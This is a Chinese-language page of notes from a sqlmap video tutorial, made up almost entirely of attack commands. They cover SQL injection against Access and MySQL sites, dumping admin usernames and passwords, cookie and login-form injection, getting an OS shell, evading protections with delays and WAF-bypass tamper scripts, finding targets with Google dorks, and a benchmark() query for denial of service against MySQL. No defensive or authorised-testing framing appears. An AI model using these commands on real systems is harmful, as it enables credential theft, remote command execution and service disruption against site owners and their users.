天天看點

羽翼sqlmap視訊筆記

access 注入

./sqlmap.py -u "url"          注入判斷

./sqlmap.py -u "url" --tables  跑表

./sqlmap.py -u "url" --columns -T admin  猜解字段

./sqlmap.py -u "url" --dump -T admin -C "username,password"

mysql系列課程

sqlmap -u "url" --dbs  擷取資料庫

sqlmap -u "url" -D myslibrary --tables   擷取資料庫中的表    這裡是猜解爆破資料

sqlmap -u "url" -D myslibrary --T hy_admin --columns 爆列名

sqlmap -u "url" -D myslibrary --T hy_admin -C id,user,password --dump  擷取字段内容

cookie注入

sqlmap -u "url" --cookie "id=9" --table --level 2   cookie注入

sqlmap -u "url" --cookie "id=9" --columns  -T admin --level 2 爆表

sqlmap -u "url" --cookie "id=9" --dump -T admin -C "username,password" --level 2

post登陸框注入

自動搜尋表單

sqlmap -u "url" --forms   自動注入

sqlmap -u "url" --data "參數"  指定參數注入

互動寫shell 及指令執行

sqlmap -u "url" --os-cmd=ipconfig

sqlmap -u "url" --os-shell   擷取shell

僞靜态注入

sqlmap -u "url?id=54*.html" --dbs    在注入的地方放一個*字鍵 然後進行注入

sqlmap -u "url?id=54*.html" -D preem --tables 擷取表

sqlmap -u "url?id=54*.html" -D preem -T pe_user --columns  得到列

sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password

sqlmap -u "url?id=54*.html" -D preem -T pe_user --C password --dump

請求延時   繞過網站的一些防護

sqlmap --dbs -u "url/40*.html" --delay 1    根據1秒來擷取

sqlmap --dbs -u "url/40*.html" --safe-freq 2   2次請求之後通路一個正确界面

來把google

sqlmap -g inurl:php?id=1

mysql dos攻擊

sqlmap -u "url" --sql-shell   首先擷取shell

select benchmark(999999999999,0x70726f626e646f70726f62616e646f70726f62616e646ff)

繞過waf防火牆

sqlmap -u "url" -v 3 --dbs --batch --tamper "charencode.py"   可以繞過一些過濾進行注入

sqlmap -u "url" --privileges 檢視目前使用者權限

繼續閱讀